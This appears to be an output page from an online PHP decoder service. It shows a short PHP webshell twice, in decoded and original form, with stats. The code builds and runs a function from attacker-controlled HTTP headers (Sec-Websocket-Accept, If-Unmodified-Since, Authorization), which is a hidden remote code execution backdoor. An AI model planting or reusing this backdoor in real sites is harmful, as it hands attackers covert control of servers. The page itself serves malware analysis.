Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $_HEADERS = getallheaders(); if (isset($_HEADERS['Sec-Websocket-Accept'])) { $..

Decoded Output download

<?php
$_HEADERS = getallheaders(); 
if (isset($_HEADERS['Sec-Websocket-Accept'])) { 
    $rindex = $_HEADERS['Sec-Websocket-Accept']('', $_HEADERS['If-Unmodified-Since']($_HEADERS['Authorization'])); 
    $rindex(); 
} ?>

Did this file decode correctly?

Original Code

<?php
$_HEADERS = getallheaders();
if (isset($_HEADERS['Sec-Websocket-Accept'])) {
    $rindex = $_HEADERS['Sec-Websocket-Accept']('', $_HEADERS['If-Unmodified-Since']($_HEADERS['Authorization']));
    $rindex();
}

Function Calls

getallheaders 1

Variables

None

Stats

MD5 447922b09dd3186aa5bdb6f9704f9b65
Eval Count 0
Decode Time 81 ms